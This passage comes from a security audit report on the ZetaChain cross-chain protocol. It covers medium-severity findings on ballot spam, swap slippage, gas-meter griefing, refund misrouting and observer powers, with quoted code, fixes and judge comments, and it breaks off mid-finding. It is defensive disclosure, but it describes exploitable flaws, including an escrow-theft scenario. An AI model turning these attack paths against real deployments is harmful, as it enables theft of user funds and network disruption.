I separated the concepts with the comma and didn’t think impacting the function of the protocol or its availability needed to show an attack path besides proving a real risk. Given that reorgs are a normal occurrence, the protocol cannot respond to network realities with this limitation, making the risk real and inevitable.

But I agree there’s no attack path presented in my report and, if that makes it QA, the rule is the rule and thank you for the fair judging.

Quick edit: I was studying the issues selected for report and I see some of the M’s don’t have a “path of exploit” or “attack path” shown. Is that really a requirement? Thank you and no more edits or comments :+1: .

0xean (Judge) commented:

Going to go with Medium on this one.

It does show that the new architecture is flawed when dealing with larger re-orgs, and I also do think that it would break the ability for the trust-less proofs to be verified against the header.

[M-05] Limited Voting Options Allow Ballot Creation Spam

Submitted by ciphermarco (1, 2), also found by deliriusz, and zhaojie

The message functions for certain types of voting allow only successful observation votes. This creates a problem if a compromised or faulty observer creates spam ballots with false observations. In this situation, honest observers have to spend resources processing the ballot but cannot cast an opposite vote to slash the spammer when the ballot reaches maturity.

Theoritically, a similar situation could happen with all ballots that do not reach the threshold. But in non-vulnerable cases, honest observer can cast an opposite vote to make the ballot reach threshold and be accounted for slashing. The real issue comes when honest observers cannot cast the honest opposite vote.

Proof of Concept

For certain types of votes, the only vote that is possible to be cast is an VoteType_SuccessObservation.

ballot, err = k.zetaObserverKeeper.AddVoteToBallot(ctx, ballot, msg.Creator, observerTypes.VoteType_SuccessObservation)
ballot, err = k.AddVoteToBallot(ctx, ballot, vote.Creator, types.VoteType_SuccessObservation)
ballot, err = k.AddVoteToBallot(ctx, ballot, msg.Creator, types.VoteType_SuccessObservation)

A compromised or faulty observer can then create ballots for spam observations that do not exist, and honest observers can never vote for the opposite option. Since the ballot’s threshold will never be reached, the ballot will remain with the status BallotStatus_BallotInProgress.

Eventually, the ballot will be processed when the DistributeObserverRewards function gathers the list of matured ballots.

ballotIdentifiers := keeper.GetObserverKeeper().GetMaturedBallotList(ctx)

But, since BuildRewardsDistribution does not account for ballots with status BallotStatus_BallotInProgress, the ballot spammer will have a totalRewardUnits == 0 instead of a negative value. This way, no slashing will be executed as a punishment for the false observation, but observers will have to process the spam observation ballot anyway.

func (m Ballot) BuildRewardsDistribution(rewardsMap map[string]int64) int64 {
	totalRewardUnits := int64(0)
	switch m.BallotStatus {
	case BallotStatus_BallotFinalized_SuccessObservation:
// ... SNIP ...
	case BallotStatus_BallotFinalized_FailureObservation:
// ... SNIP ...
return totalRewardUnits

The compromised observer is then free to create as many false observation ballots as he wishes, effectively spamming the network and draining honest observer’s resources without a punishment.

Additional Note

Besides wasting network participant’s execution resources, the ballots are never deleted from storage after the distribution. But there is a comment evidencing this is an obviously known issue and, thus, included as merely a reminder in this report.

	// TODO : Delete Ballots after distribution
	// https://github.com/zeta-chain/node/issues/942

Similarly to what happens in other types of votes, allow honest observers to cast a negative observation vote if they wish. Thus, when the ballot reaches maturity and is processed for reward distribution, the dishonest or faulty observer is slashed to pay for any resources spent with the false observation.

This is how msg_tss_voter.go and keeper_cross_chain_tx_vote_outbound_tx.go work:

	if msg.Status == common.ReceiveStatus_Success {
		ballot, err = k.zetaObserverKeeper.AddVoteToBallot(ctx, ballot, msg.Creator, observerTypes.VoteType_SuccessObservation)
		if err != nil {
			return &types.MsgCreateTSSVoterResponse{}, err
	} else if msg.Status == common.ReceiveStatus_Failed {
		ballot, err = k.zetaObserverKeeper.AddVoteToBallot(ctx, ballot, msg.Creator, observerTypes.VoteType_FailureObservation)
		if err != nil {
			return &types.MsgCreateTSSVoterResponse{}, err
	ballot, err = k.zetaObserverKeeper.AddVoteToBallot(ctx, ballot, msg.Creator, observerTypes.ConvertReceiveStatusToVoteType(msg.Status))
	if err != nil {
		return nil, err

Special attention must be give to ensure the corrected voting type’s Digest function output is generalised for all types of votes. Similarly to what is done with MsgVoteOnObservedOutboundTx.

func (msg *MsgVoteOnObservedOutboundTx) Digest() string {
	// ... SNIP ...
	// Set status to ReceiveStatus_Created to make sure both successful and failed votes are added to the same ballot
	m.Status = common.ReceiveStatus_Created
	// ... SNIP ...

lumtis (ZetaChain) acknowledged

[M-06] PayGasFeeInZetaAndUpdateCctx() is prone to slippage, causing sender overpays the revert gas and lose returned funds

Submitted by oakcobalt, also found by MevSec, deliriusz, QiuhaoLi, and p0wd3r


UniswapV2 swap on zetaChain is used in multiple flows where the protocol will swap either zeta or ERC20 token to gas erc20 token to pay for outbound tx gas. However, there is no slippage protection for the swapping transaction which makes the process of charging gas fees slippage-prone, easily causing the sender to overpay the revert gas and lose returned funds.

Proof of Concept

When an outbound tx is initiated whether as a revert tx or diverted outbound tx, PayGasAndUpdateCctx() on gas_payment.go will be called. Based on CointType, PayGasAndUpdateCctx() divert the flow into different process that swaps either zeta token or ERC20 token into gas token of the external chain to pay for revert or outbound gas.

For example, CointType is zeta coin. PayGasInZetaAndUpdateCctx() will be called, which will first calculate gas token amount needed based on the external chainId. Then it first calls QueryUniswapV2RouterGetZetaAmountsIn() which query wzeta/gasZRC20 uniswapv2 pool for zeta token amount (outTxGasFeeInZeta) needed to swap out outTxGasFee.BigInt() amount of gasZRC20 token. Then it will call CallUniswapV2RouterSwapExactETHForToken() with exact input outTxGasFeeInZeta amount.

The above is problematic because after QueryUniswapV2RouterGetZetaAmountsIn(), there is no check to ensure the quoted input token amount outTxGasFeeInZeta is acceptable within a certain slippage parameter. When there is significant slippage in the uniswapV2 pool before protocol’s PayGasInZetaAndUpdateCctx() call, gasZRC20 token price in zeta amount will be inflated,causing gas overcharged.

When gas is overcharged, (1) this either cause feeInZeta.GT(zetaBurnt) == true which means sender doesn’t have enough zeta token to burn, which directly return an error, which might cause a revert cctx to be aborted and sender will lose all refunds. (2) Or if feeInZeta.GT(zetaBurnt) == false, sender’s zeta balance will be substracted by inflated gas payment, and the sender is overcharged.

func (k Keeper) PayGasInZetaAndUpdateCctx(
	ctx sdk.Context,
	chainID int64,
	cctx *types.CrossChainTx,
	zetaBurnt math.Uint,
	noEthereumTxEvent bool,
) error {
// get the gas fee in Zeta using system uniswapv2 pool wzeta/gasZRC20 and adding the protocol fee
//@audit this quote the price of gasZRC20 in zeta denomination. There is no slippage check to ensure `outTxGasFeeInZeta` is not inflated. 
|>	outTxGasFeeInZeta, err := k.fungibleKeeper.QueryUniswapV2RouterGetZetaAmountsIn(ctx, outTxGasFee.BigInt(), gasZRC20)
feeInZeta := types.GetProtocolFee().Add(math.NewUintFromBigInt(outTxGasFeeInZeta))
//@audit-info when feeInZeta.GT(zetaBurnt)==true, sender doesn't have enough zeta to pay for gas, this return error, if the cctx is revert tx, this will abort and sender will lose all refunds
	if feeInZeta.GT(zetaBurnt) {
		return cosmoserrors.Wrap(types.ErrNotEnoughZetaBurnt, fmt.Sprintf("feeInZeta(%s) more than zetaBurnt (%s) | Identifiers : %s ",
//@audit-info when feeInZeta.GT(zetaBurnt)==false, this substract user zeta balance. Sender might be overcharged for gas due to slippage.
	newAmount := zetaBurnt.Sub(feeInZeta)
//@audit This is directly execute the swap based on previous quote amount, slippage will be realized here.
|>	amounts, err := k.fungibleKeeper.CallUniswapV2RouterSwapExactETHForToken(


As seen above, any price of gasZRC20 will be accepted during gas payment, will directly result in either user losing the entire refund or user overpaying for gas. I consider this medium severity.

Check and handle slippage case. For example, when QueryUniswapV2RouterGetZetaAmountsIn() returns an overinflated value due to slippage, return gas payment flow with a slippage error, and handle slippage error in the corresponding vote inbound/outbound tx flow to allow for pending cctx instead of direct abort.

lumtis (ZetaChain) confirmed

0xean (Judge) commented:

Can see this qualifying as a leak of value and therefore warranting M severity.

[M-07] User not refunded for failed Zeta gas payment in cross chain transaction

Submitted by deliriusz, also found by oakcobalt, zhaojie, and dontonka




Vulnerability details

When observed CCTX (cross chain transaction) gathers enough votes in VoteOnObservedInboundTx, it is being processed immediately. In case that the transaction is reverted for whatever reason, it returns an error and changes CCTX status to CctxStatus_Aborted - such a transaction won’t be processed:

			if err != nil {
				// do not commit anything here as the CCTX should be aborted

				// gas payment for erc20 type might fail because no liquidity pool is defined to swap the zrc20 token into the gas token
				// in this gas we should refund the sender on ZetaChain
				if cctx.InboundTxParams.CoinType == common.CoinType_ERC20 {

					if err := k.RefundAmountOnZetaChain(ctx, cctx, cctx.InboundTxParams.Amount); err != nil {
						// log the error
						k.Logger(ctx).Error("failed to refund amount of aborted cctx on ZetaChain",
							"error", err,
							"sender", cctx.InboundTxParams.Sender,
							"amount", cctx.InboundTxParams.Amount.String(),

				cctx.CctxStatus.ChangeStatus(types.CctxStatus_Aborted, err.Error())
				return &types.MsgVoteOnObservedInboundTxResponse{}, nil

There is also no mechanism for retrieving the funds back. TSS could probably initialize such a refund, however it required quorum of nodes to do so, and there is no automatic process for this in code in scope. Possible issues for transaction errors are numerous, I’ll list just some of them that immediately come to my head:

  • too little amount to cover gas fees. Please note that UniswapV2 is used here, and as described in another issue, it doesn’t have proper price manipulation protection, meaning that one of the results may be swapping in highly manipulated pool for overly small fee token amount, making the CCTX error out and abort
  • no valid pool for UniswapV2 swap
  • too little gas paid to process the transaction
  • stale gas prices recorded by keepers
  • any issues with gas coin setting in the zetacored

For cross chain swaps it’s even worse, because there is no notion of a refund at all, meaning that the funds are frozen:

	// [...]
} else { // Cross Chain SWAP
		tmpCtx, commit := ctx.CacheContext()
		err = func() error {
			err := k.PayGasAndUpdateCctx(
			if err != nil {
				return err
			// [...]
		if err != nil {
			// do not commit anything here as the CCTX should be aborted
			cctx.CctxStatus.ChangeStatus(types.CctxStatus_Aborted, err.Error()) // @audit status changed to "Aborted" without refunding user the money. This refund is partially handled in case of transaction to Zeta
			return &types.MsgVoteOnObservedInboundTxResponse{}, nil


Temporary or permament freezing of user funds, depending if TSS holders technically are able and willing to refund the funds manually.

Proof of Concept

  1. User creates cross chain transaction in ZetaChain
  2. The tranasction is reverted, due to Uniswap pool imbalance. Because EVM returns error, the transaction status is changed to Aborted.
  3. The user funds are locked.

lumtis (ZetaChain) confirmed

[M-08] Funds from reverted transaction may be lost/locked

Submitted by deliriusz, also found by zhaojie and p0wd3r


Vulnerability details

When the cross chain transaction is reverted on destination chain, the revert transaction is processed on source chain, and the remaining amount of Zeta tokens, excluding fees is returned to the CCTX sender. According to the code comment in /x/crosschain/keeper/keeper_cross_chain_tx_vote_outbound_tx.go:

If the previous status was PendingOutbound, a new revert transaction is created. To cover the revert transaction fee, the required amount of tokens submitted with the CCTX are swapped using a Uniswap V2 contract instance on ZetaChain for the ZRC20 of the gas token of the receiver chain. The ZRC20 tokens are then burned. The nonce is updated. If everything is successful, the CCTX status is changed to PendingRevert.

If the previous status was PendingRevert, the CCTX is aborted.

The flow is:

  1. A cross-chain transaction is generated on the source chain. It’s verified and its status is changed to PendingOutbound.
  2. The transaction execution is attempted on the destination chain and fails. It is observed by zetaclient/evm_signer/TryProcessOutTx, and broadcased:
  // [...]
	} else if send.CctxStatus.Status == types.CctxStatus_PendingRevert {
		logger.Info().Msgf("SignRevertTx: %d => %s, nonce %d, gasprice %d", send.InboundTxParams.SenderChainId, toChain, send.GetCurrentOutTxParam().OutboundTxTssNonce, gasprice)
		tx, err = signer.SignRevertTx( // @audit executes ZetaConnector.onRevert()
  // [...]
	if tx != nil {
			// [...]
			err := signer.Broadcast(tx)
  1. In case that this is non-eth revert, ZetaConnector.non-eth is called:
        function onRevert(
            address zetaTxSenderAddress,
            uint256 sourceChainId,
            bytes calldata destinationAddress,
            uint256 destinationChainId,
            uint256 remainingZetaValue,
            bytes calldata message,
            bytes32 internalSendHash
        ) external override whenNotPaused onlyTssAddress {
            if (remainingZetaValue + ZetaNonEthInterface(zetaToken).totalSupply() > maxSupply)
                revert ExceedsMaxSupply(maxSupply);
            ZetaNonEthInterface(zetaToken).mint(zetaTxSenderAddress, remainingZetaValue, internalSendHash);

            if (message.length > 0) {
    		// [...]

There are 3 possibilities when it may fail:

  1. Amount to be minted together with totalSupply() is bigger than maxSupply
  2. ZetaReceiver(zetaTxSenderAddress).onZetaRevert() call reverts
  3. TSS provides too little gas on purpose, but we assume that it’s trused, so it’s not really an issue.

If if fails, the transaction state is set to Aborted in x/crosschain/keeper/keepercrosschaintxvoteoutboundtx.go, and it won’t be processed:

				case types.CctxStatus_PendingRevert:
					cctx.CctxStatus.ChangeStatus(types.CctxStatus_Aborted, "Outbound failed: revert failed; abort TX")

In won’t be processed again.

And because only Connector can mint the tokens, the funds are lost without anyone able to mint them for the user.

Concerning maxSupply, it’s set to uint256.max during contract creation, however it’s adjustable by TSS to any value:

    function setMaxSupply(uint256 maxSupply_) external onlyTssAddress {
        maxSupply = maxSupply_;
        emit MaxSupplyUpdated(msg.sender, maxSupply_);


User funds lost in case that revert transaction reverts on source chain.

Proof of Concept

Let’s take following example:

  1. User creates a cross chain transaction, to sends 10_000$ worth of ZRC20 cross chain using ZetaChain. He posts a transaction to ZetaConnectorNonEth.send(), which creates cross chain transaction.
  2. The transaction is reverted on destination chain. Hence new state PendingRevert is added to the transaction and awaits to be processed on the source chain.
  3. ZetaConnectorNonEth.onRevert() is called on source chain. It reverts and cross chain transaction state is set to Aborted.
  4. The funds are burned on source chain, and not minted back, meaning that the funds are lost.
  1. Make sure that TSS cannot decrease maxSupply over constance MIN_SUPPLY_CAP or current totalSupply()
    function setMaxSupply(uint256 maxSupply_) external onlyTssAddress {
+		if(maxSupply < MIN_SUPPLY_CAP) {revert MaxSupplyTooSmall()};
        maxSupply = maxSupply_;
        emit MaxSupplyUpdated(msg.sender, maxSupply_);
  1. Handle this case gracefully - consider not aborting the transaction in case of revert transaction failure, or add some kind of “voucher” that the user can redeem manually.

lumtis (Zetachain) confirmed via duplicate Issue #245

[M-09] Direct WETH swap fails due to incompatibility with ZetaTokenConsumerUniV3 & ZetaTokenConsumerPancakeV3

Submitted by Josephdara_0xTiwa



User use the ZetaTokenConsumerUniV3.sol to get the zeta tokens. Either through ETH or through other ERC20 tokens. One of the most important tokens in Defi today is the WETH token, all swaps in the codebase to/from ZETA are routed through the ZETA/WETH pool. However this contact, as well as the ZetaTokenConsumerPancakeV3 and the ZetaTokenConsumerTrident do not permit users to swap WETH directly to ZETA. This is because of an oversight in the swap function that require the existence of a WETH/WETH pool. As seen below, when the input/output token is WETH, the function will revert:

 function getZetaFromToken(
        address destinationAddress,
        uint256 minAmountOut,
        address inputToken,
        uint256 inputTokenAmount
    ) external override returns (uint256) {
        if (destinationAddress == address(0) || inputToken == address(0)) revert ZetaCommonErrors.InvalidAddress();
        if (inputTokenAmount == 0) revert InputCantBeZero();

        IERC20(inputToken).safeTransferFrom(msg.sender, address(this), inputTokenAmount);
        IERC20(inputToken).safeApprove(address(uniswapV3Router), inputTokenAmount);

        ISwapRouter.ExactInputParams memory params = ISwapRouter.ExactInputParams({
            deadline: block.timestamp + MAX_DEADLINE,
            path: abi.encodePacked(inputToken, tokenPoolFee, WETH9Address, zetaPoolFee, zetaToken),
            recipient: destinationAddress,
            amountIn: inputTokenAmount,
            amountOutMinimum: minAmountOut

Proof of Concept

From the Pancake V3 factory and Uni V3 factory contracts, it is evident that pools cannot be created for a token with itself. Therefore users cannot swap WETH to WETH thereby breaking the path needed to swap WETH to Zeta or vice versa. In the code base, the issue is present:

Implement a check to see if the input/output token is WETH, if so, perform the swap directly between WETH and ZETA without a second swap.

josephdara (Warden) commented:

All references stated in the POC section are lines of code in the codebase within scope that require a WETH/WETH pool.

When the Input token is WETH, it attempts to first swap to WETH, then to ZETA. When the output token is WETH, it first swaps ZETA to WETH, then attempts swapping WETH to WETH.

This was explained above with all the points that this happened listed in the POC section.

0xean (Judge) commented:

More evidence would certainly have been welcomed, but I follow the wardens belief that this would cause an issue when attempting to call getZetaFromToken() and the input is WETH.

lumtis (ZetaChain) confirmed

[M-10] A single malicious observer can exploit the infinite gas meter to grief ZetaChain blocks without proper gas compensation

Submitted by berndartmueller

ZetaChain blocks can be griefed by a single observer, possibly preventing other transactions from being processed.

Proof of Concept

A Cosmos SDK app’s ante handler verifies transactions (gas, messages,..) before further processing and before the individual messages are passed onto the respective handlers.

ZetaChain sets up the ante handler in the NewAnteHandler function and handles transactions differently depending on their type. For example, MsgEthereumTx Evmos EVM messages require different ante handlers than regular Cosmos SDK messages.

Specifically, regular Cosmos SDK transactions have their messages checked in lines 97-112 and if at least one of the messages is a MsgGasPriceVoter or MsgVoteOnObservedInboundTx message, an infinite transaction gas meter is used.

056: func NewAnteHandler(options ethante.HandlerOptions) (sdk.AnteHandler, error) {
... 		// [...]
093: 		// handle as totally normal Cosmos SDK tx
094: 		switch tx.(type) {
095: 		case sdk.Tx:
096: 			found := false
097: 			for _, msg := range tx.GetMsgs() {
098: 				switch msg.(type) {
099: 				// treat these two msg types differently because they might call EVM which results in massive gas consumption
100: 				// For these two msg types, we don't check gas limit by using a different ante handler
101: 				case *cctxtypes.MsgGasPriceVoter, *cctxtypes.MsgVoteOnObservedInboundTx:
102: 					found = true
103: 					break
104: 				}
105: 			}
106: 			if found {
107: 				// this differs newCosmosAnteHandler only in that it doesn't check gas limit
108: 				// by using an Infinite Gas Meter.
109: 				anteHandler = newCosmosAnteHandlerNoGasLimit(options)
110: 			} else {
111: 				anteHandler = newCosmosAnteHandler(options)
112: 			}
... 		// [...]
119: }

The reasoning is that both the MsgGasPriceVoter and MsgVoteOnObservedInboundTx messages (exclusively limited to observers) interact with the internal zEVM (Evmos), which has a different gas model (EVM equivalent) than Cosmos SDK. To prevent out-of-gas errors, an infinite gas meter is used.

However, this is problematic as the code in line 97-112 only checks if at least one of the messages is a MsgGasPriceVoter or MsgVoteOnObservedInboundTx message. If the transaction also contains other messages, the same infinite transaction gas meter applies to them as well and the transaction will not run out of gas.

Consequently, a turned-malicious observer can craft a transaction that contains a MsgGasPriceVoter or MsgVoteOnObservedInboundTx message and a lot of other messages that consume a lot of gas. As the infinite transaction gas meter is used, the transaction will be processed without running out of gas. The observer only pays a negligible amount of gas (purposefully set very low) but is able to spam the network and fill up block space, possibly preventing other transactions from being processed if the block gas limit is reached (which is set by default to 10 million in CometBFT).

Nevertheless, this is a privilege escalation as single observes are not supposed to have such a significant impact on the ZetaChain’s block space, and thus, medium severity was chosen.

Consider only using the infinite transaction gas meter if all of the transaction’s messages are of the type MsgGasPriceVoter or MsgVoteOnObservedInboundTx.

DadeKuma (Lookout) commented:

Bundling costly messages before a MsgGasPriceVoter (or MsgVoteOnObservedInboundTx) may result in infinite gas consumption.

lumtis (ZetaChain) confirmed

[M-11] The outbound transaction tracker only keeps track of a maximum of two different transaction hashes, preventing cctxs from being efficiently confirmed and blocking the outbound transaction queue

Submitted by berndartmueller, also found by oakcobalt

The outbound transaction queue is potentially blocked by such “stuck” transactions, preventing other pending cctxs from being sent out.

Proof of Concept

The AddToOutTxTracker function, handling the MsgAddToOutTxTracker message, adds a transaction hash associated with a pending cctx to the outbound transaction tracker, which is subsequently watched by observers to detect the transaction’s inclusion and confirmation in a block. As a result, the pending cctx is marked as CctxStatus_OutboundMined.

This MsgAddToOutTxTracker message is sent by observers as soon as the outbound transaction is broadcast. See zetaclient/evm_signer.go#L585 and zetaclient/btc_signer.go#L360.

However, the AddToOutTxTracker function only keeps track of a maximum of two different transaction hashes, as seen in line 100. Otherwise, the msg.TxHash is discarded.

024: func (k msgServer) AddToOutTxTracker(goCtx context.Context, msg *types.MsgAddToOutTxTracker) (*types.MsgAddToOutTxTrackerResponse, error) {
...   // [...]
082: 	var isDup = false
083: 	for _, hash := range tracker.HashList {
084: 		if strings.EqualFold(hash.TxHash, msg.TxHash) {
085: 			isDup = true
086: 			if isProven {
087: 				hash.Proved = true
088: 				k.SetOutTxTracker(ctx, tracker)
089: 				k.Logger(ctx).Info("Proof'd outbound transaction")
090: 				return &types.MsgAddToOutTxTrackerResponse{}, nil
091: 			}
092: 			break
093: 		}
094: 	}
095: 	if !isDup {
096: 		if isProven {
097: 			hash.Proved = true
098: 			tracker.HashList = append([]*types.TxHashList{&hash}, tracker.HashList...)
099: 			k.Logger(ctx).Info("Proof'd outbound transaction")
100: ❌		} else if len(tracker.HashList) < 2 {
101: 			tracker.HashList = append(tracker.HashList, &hash)
102: 		}
103: 		k.SetOutTxTracker(ctx, tracker)
104: 	}
105: 	return &types.MsgAddToOutTxTrackerResponse{}, nil
106: }

This is problematic as an outbound cctx, uniquely identified by its nonce, can have multiple different transaction hashes caused by repeatedly increasing the gas price every epoch.

As soon as the gas price has been increased and observers broadcast the updated transaction (i.e., replace it in the mempool), the transaction hash will change. As a result, reporting the transaction hash to ZetaChain via the AddTxHashToOutTxTracker function call will not keep track of the new transaction hash.

Consequently, the EVM client’s observeOutTx and the BTC client’s observeOutTx function are not able to query the transaction by the available hashes found in the tracker HashList. This results in the outbound cctx being repeatedly processed by the observers, unnecessarily “blocking” other pending cctxs from being sent out (due to limiting the amount of sent outbound cctx per the 3-second ticker).

Only after such a “stuck” transaction is manually added to the outbound transaction tracker via the AddTxHashToOutTxTracker function by providing a block inclusion proof, the correct and up-to-date transaction hash is added to the tracker and the observers can finally confirm and conclude the cctx. However, this is a separate process and requires (manual) intervention, which might take some time until it is noticed.

Consider keeping track of all transaction hashes associated with a pending cctx instead of limiting it to two hashes.

lumtis (ZetaChain) acknowledged

[M-12] ERC-20 deposit cctxs are refunded to the EOA instead of an intermediary contract

Submitted by berndartmueller

The EOA is set as the beneficiary of a failed and refunded inbound ERC-20 deposit cctx, instead of a potential intermediary contract. Funds can be stolen from this intermediary contract.

Additionally, but less severe, the zContext’s origin is also set to the EOA.

Proof of Concept

Observers watch external EVM chains for the Deposited event emitted by the ERC20Custody.deposit function on ERC-20 token deposits. Specifically, these logs are processed by calling the GetInboundVoteMsgForDepositedEvent function in the following instances:

  1. Observing the inbound transaction tracker, see node/zetaclient/inbound_tracker.go#L193
  2. Querying the EVM chain, see node/zetaclient/evm_client.go#L894

However, in line 123, the MsgVoteOnObservedInboundTx message’s Sender is set to the transaction signer EOA address (sender) instead of the caller (msg.sender) of the ERC20Custody.deposit function.

103: func (ob *EVMChainClient) GetInboundVoteMsgForDepositedEvent(event *erc20custody.ERC20CustodyDeposited) (types.MsgVoteOnObservedInboundTx, error) {
...   // [...]
115: 	signer := ethtypes.NewLondonSigner(big.NewInt(ob.chain.ChainId))
116: 	sender, err := signer.Sender(tx)
117: 	if err != nil {
118: 		ob.logger.ExternalChainWatcher.Error().Err(err).Msg(fmt.Sprintf("can't recover the sender from the tx hash: %s", event.Raw.TxHash.Hex()))
119: 		return types.MsgVoteOnObservedInboundTx{}, errors.Wrap(err, fmt.Sprintf("can't recover the sender from the tx hash: %s", event.Raw.TxHash.Hex()))
121: 	}
122: 	return *GetInBoundVoteMessage(
123: ❌ 		sender.Hex(),
124: 		ob.chain.ChainId,
125: 		"",
126: 		clienttypes.BytesToEthHex(event.Recipient),
127: 		common.ZetaChain().ChainId,
128: 		sdkmath.NewUintFromBigInt(event.Amount),
129: 		hex.EncodeToString(event.Message),
130: 		event.Raw.TxHash.Hex(),
131: 		event.Raw.BlockNumber,
132: 		1_500_000,
133: 		common.CoinType_ERC20,
134: 		event.Asset.String(),
135: 		ob.zetaClient.GetKeys().GetOperatorAddress().String(),
136: 		event.Raw.Index,
137: 	), nil
138: }

It is very likely that an intermediary contract deployed on a supported EVM chain is interacting with the ERC20Custody contract. In this case, the EOA interacting with this contract and subsequently initiating the deposit of the ERC-20 tokens will be set as the Sender address.

If the cctx fails and a refund to the source chain is sent, this EOA will be the receiver of the funds. Depending on the business logic of the intermediary contract, this allows an EOA to steal its funds.

An inbound cctx can fail for various reasons, but most importantly, the error has to originate from node/x/fungible/keeper/deposits.go#L52-L85. For example, if the liquidity cap of the deposited asset is reached and the types.ErrForeignCoinCapReached error is returned, the cctx is considered failed and a refund is initiated.


Given the following simple Solidity contract on Ethereum Mainnet that intends to keep user funds in escrow and some time later, allows the owner of the contract to bridge the aggregated escrowed funds to ZetaChain.

The owner calls the bridge function. The EOA address will be set as the Sender of the MsgVoteOnObservedInboundTx message.

If the inbound cctx fails and a refund is initiated, the EOA will receive all the funds. Consequently, the owner is able to steal the escrowed user funds from this contract:

contract Escrow {
    ERC20Custody public custody;
    mapping (address => mapping (IERC20 => uint256)) public escrowed;
    address owner;

    modifier onlyOwner() {
        require(msg.sender == owner, "Only owner can call this function.");

    constructor(ERC20Custody custody_, address owner_) {
        custody = custody_;
        owner = owner_;

    function escrow(IERC20 asset, uint256 amount) {
        asset.transferFrom(msg.sender, address(this), amount);

        escrowed[msg.sender][asset] += amount;

    function bridge(
        bytes calldata recipient,
        IERC20 asset,
        uint256 amount,
        bytes calldata message
    ) external onlyOwner {
        asset.approve(address(custody), amount);
        custody.deposit(recipient, asset, amount, message);

Consider adding the msg.sender of the ERC20Custody.deposit function as an additional event parameter to the Deposited event. This parameter can then be used to set the Sender of the MsgVoteOnObservedInboundTx message.

lumtis (ZetaChain) confirmed

[M-13] The Sender of an outbound cctx originating from the zEVM is potentially set to an incorrect sender address resulting in lost assets during a refund

Submitted by berndartmueller, also found by p0wd3r

If an intermediary contract is used on the zEVM when interacting with the ZetaConnectorZEVM contract or ZRC-20 tokens, potential refunds are sent to the transaction signer instead of the intermediary contract, allowing users to steal assets by crafting a cctx that fails and refunds the assets to them.

Determining the validity of the message call via the ZetaInteractor.isValidMessageCall modifier is unreliable.

Proof of Concept

zEVM transactions are post-processed in the PostTxProcessing function of the x/crosschain module. Specifically, the goal is to parse and process ZetaSent and ZRC-20 Withdrawal events and send them to the corresponding, external receiver chains.

Any emitted ZetaSent events are parsed and processed in the ProcessZetaSentEvent function. Similarly, ZRC-20 Withdrawal events are processed in the ProcessZRC20WithdrawalEvent function.

Both functions create a MsgVoteOnObservedInboundTx message in lines 139-154 and 214-228.

However, the Sender is set to the emittingContract address in line 141 and 216, which is the address of the transaction signer (i.e., sender - tx.origin). In the very special case that the transaction is a contract creation transaction, the To address is set to nil, and thus the Sender is set to nil as well.

In both cases, it is problematic as the cctx’s Sender is used in case the outbound cctx is reverted and will be set as the receiver of the refund. As a result, the refund is potentially sent to the wrong recipient.

Moreover, the Sender is provided to the ZetaConnectorEth.onReceive (or non-eth connector) function as the zetaTxSenderAddress address. This sender address can be used to implement access protection on the receiving contract by using the ZetaInteractor.isValidMessageCall modifier. However, as the zetaTxSenderAddress is unreliably set (always to the transaction signer’s address), this limits the functionality and prevents the use of an intermediary contract on the zEVM.

Similarly, in the HandleEVMDeposit function, calling the ProcessLogs function to process any logs that are a result of a zEVM deposit, and providing the msg.Receiver (i.e., to) as the emittingContract address, results in similar issues.


Using an intermediary contract on the zEVM that interacts with the ZetaConnectorZEVM contract causes refund issues and access protection issues on the receiving contract.

Additionally, interacting with the ZetaConnectorZEVM contract on the zEVM, as part of a contract creation transaction, is discouraged and leads to lost assets when attempting to refund a failed cctx. This should be clearly documented to prevent users from losing assets.

Consider using the zetaTxSenderAddress address of the ZetaSent event as well as the from address of the Withdrawal event as the Sender of the cctx.

lumtis (ZetaChain) confirmed

[M-14] Outbound zEVM cross-chain messages ignore the user-specified gas limit and may fail with an out-of-gas error

Submitted by berndartmueller, also found by dontonka

Cross-chain Zeta messages originating from the zEVM have the user-specified destination gas limit ignored (hardcoded to 90000), potentially causing the transaction to fail with an out-of-gas error.

As a result, the cctx is aborted without refunding the sender, thus causing the sender to lose funds.

Proof of Concept

zEVM transactions are post-processed in the PostTxProcessing function of the x/crosschain module. Specifically, the goal is to parse and process ZetaSent and ZRC-20 Withdrawal events and send them to the corresponding external receiver chains.

Any emitted ZetaSent events are parsed and processed in the ProcessZetaSentEvent function. This event is emitted by the ZetaConnectorZEVM.send function to send a cross-chain message to an external chain. The message input, ZetaInterfaces.SendInput, allows the sender to specify the destinationGasLimit to ensure sufficient gas is used, in case the cross-chain message, once received by the onReceive function of the ZetaConnector contract on the receiver chain (e.g., ZetaConnectorEth or ZetaConnectorNonEth) calls the destinationAddress’s onZetaMessage function.

However, this user-specified gas limit (destinationGasLimit) is not used, instead, it is hardcoded in line 224 to 90000.

172: func (k Keeper) ProcessZetaSentEvent(ctx sdk.Context, event *connectorzevm.ZetaConnectorZEVMZetaSent, emittingContract ethcommon.Address, txOrigin string) error {
...  	// [...]
213: 	// Bump gasLimit by event index (which is very unlikely to be larger than 1000) to always have different ZetaSent events msgs.
214: 	msg := types.NewMsgVoteOnObservedInboundTx(
215: 		"",
216: 		emittingContract.Hex(),
217: 		senderChain.ChainId,
218: 		txOrigin, toAddr,
219: 		receiverChain.ChainId, /
220: 		amount,
221: 		"",
222: 		event.Raw.TxHash.String(),
223: 		event.Raw.BlockNumber,
224: ❌	90000,
225: 		common.CoinType_Zeta,
226: 		"",
227: 		event.Raw.Index,
228: 	)
229: 	sendHash := msg.Digest()
231: 	// Create the CCTX
232: 	cctx := k.CreateNewCCTX(ctx, msg, sendHash, tss.TssPubkey, types.CctxStatus_PendingOutbound, &senderChain, receiverChain)
...  	// [...]
246: }

Please note that the observer’s EVM signer lower-bounds the gas limit to 100k.

As the transactions gas limit is set to 90k, and subsequently overwritten to the lower bound of 100k, the transaction potentially fails with an out-of-gas error, preventing the transaction from being processed.

The sender of the cross-chain Zeta message may have anticipated this and thus specified a higher destinationGasLimit in the first place to ensure the transaction succeeds, which is unfortunately ignored.

Consider using the user-specified destinationGasLimit instead of hardcoding the gas limit to 90000.

lumtis (ZetaChain) acknowledged

[M-15] Observer can halt outbound cctxs and steal funds

Submitted by berndartmueller


A single observer has too much power over the ZetaChain network, allowing them to halt outbound cctxs and steal funds.

Proof of Concept

Both the MsgAddToInTxTracker and MsgAddToOutTxTracker messages allow observers to add a transaction to the tracker without providing Merkle proof to verify if the transaction is valid.

This is a real risk to ZetaChain as a single malicious observer is able to cause significant harm.

For example, the MsgAddToInTxTracker message can be misused in the following ways:

